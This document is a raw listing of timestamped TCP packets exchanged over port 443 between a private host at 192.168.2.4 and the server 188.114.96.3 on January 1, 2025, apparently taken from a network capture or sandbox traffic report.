Jan 1, 2025 17:10:06.657843113 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.657850027 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.658129930 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.658174992 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.658185959 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.658190966 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.658237934 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.658335924 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.658376932 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.658534050 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.658593893 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.658600092 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.658648968 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.699270964 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.699322939 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.699331999 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.699357033 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.699364901 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.699394941 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.699409962 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.700349092 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.700419903 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.700426102 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.700618029 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.700633049 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.700686932 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.700695038 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.700723886 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.701131105 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.701189041 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.701201916 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.701208115 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.701253891 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.701639891 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.701657057 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.701733112 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.701738119 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.701772928 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.701807022 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.701812029 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.701838017 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.701874018 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.748821974 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.748847961 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.748889923 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.748908043 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.748920918 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.748928070 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.748950958 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.748958111 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.748987913 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.749011993 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.749016047 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.749032021 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.749072075 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.749078035 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.749088049 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.749119043 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.749125004 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.749147892 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.749416113 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.749429941 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.749506950 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.749515057 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.789905071 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.789943933 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.789963961 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.789973974 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.790005922 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.790024996 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.790757895 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.790812016 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.790818930 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.791222095 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.791235924 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.791286945 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.791295052 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.791567087 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.791614056 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.791620970 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.791634083 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.791676998 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.791686058 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.792068005 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.792082071 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.792124987 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.792131901 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.792160988 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.792273998 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.792319059 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.792336941 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.792344093 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.792367935 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.792375088 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.832654953 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.832758904 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.839345932 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.839401960 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.839410067 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.839426041 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.839452028 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.839457989 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.839489937 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.839528084 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.839557886 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.839613914 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.839703083 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.839751959 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.839761972 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.839771032 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.839788914 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.839809895 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.840043068 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.840107918 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.840115070 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.840125084 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.840178013 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.840184927 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.840223074 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.887967110 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.888020992 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.888036966 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.888047934 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.888202906 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.888211966 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.888220072 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.888247967 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.888256073 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.888279915 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.888283968 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.888309002 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.888333082 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.888437033 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.888494015 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.888499975 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.888612032 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.888672113 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.888685942 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.888730049 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.888782978 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.888789892 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.889065981 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.889087915 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.889131069 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.889142036 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.889154911 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.889539957 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.889586926 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.889606953 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.889615059 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.889646053 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.889666080 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.929902077 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.929919004 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.929975986 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.929990053 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.930002928 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.930218935 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.930264950 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.930278063 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.930284023 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.930320024 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.930613995 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.930634022 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.930670977 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.930676937 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.930689096 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.983499050 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.983520985 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.983562946 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.983584881 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.983599901 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.983834028 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.983854055 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.983902931 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.983911991 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.983922958 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.983963966 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.983983040 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.984011889 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.984019995 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.984050035 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.984154940 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.984174013 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.984215021 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.984224081 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.984244108 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.984288931 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.984313965 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.984347105 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.984357119 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.984368086 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.024274111 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.024290085 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.024338961 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.024359941 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.024373055 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.024553061 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.024570942 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.024605989 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.024614096 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.024624109 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.024723053 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.024736881 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.024781942 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.024787903 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.024796963 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.069457054 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.069478035 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.069535017 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.069549084 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.069567919 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.069694996 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.069708109 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.069751024 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.069760084 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.069771051 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.070055962 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.070072889 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.070118904 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.070126057 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.070149899 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.070527077 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.070538998 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.070590019 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.070595980 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.070625067 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.070898056 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.070915937 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.070952892 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.070960045 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.070975065 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.114813089 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.114826918 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.114883900 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.114897966 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.115223885 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.115242958 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.115294933 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.115303993 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.115334988 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.115516901 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.115531921 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.115581989 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.115588903 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.115622044 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.156039000 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.199855089 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.199871063 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.199922085 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.199932098 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.199970961 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.200187922 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.200208902 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.200248957 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.200258970 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.200278997 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.200285912 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.200643063 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.200661898 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.200721025 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.200728893 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.200822115 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.201026917 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.201051950 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.201102018 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.201107979 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.201148987 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.202038050 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.202052116 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.202091932 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.202099085 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.202121973 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.202137947 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.205291033 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.205310106 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.205355883 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.205363989 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.205374956 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.205409050 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.205674887 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.205688000 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.205719948 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.205725908 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.205744982 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.205769062 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.206125975 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.206140041 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.206181049 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.206192017 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.206204891 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.206258059 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.290705919 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.290721893 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.290798903 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.290812969 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.290858984 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.290920973 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.290935040 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.290990114 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.290997028 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.291035891 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.291291952 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.291306019 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.291363955 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.291372061 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.291409016 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.291635990 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.291650057 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.291687012 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.291695118 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.291712046 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.291734934 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.292675018 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.292689085 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.292740107 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.292747974 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.292788982 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.293095112 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.293139935 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.293154001 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.293164015 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.293189049 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.297769070 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.297780991 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.297826052 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.297836065 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.297848940 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.298136950 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.298151016 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.298196077 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.298204899 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.298214912 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.298401117 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.298413992 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.298464060 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.298470974 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:07.298492908 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.343636990 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:07.381586075 CET	443	49733	188.114.96.3	192.168.2.4
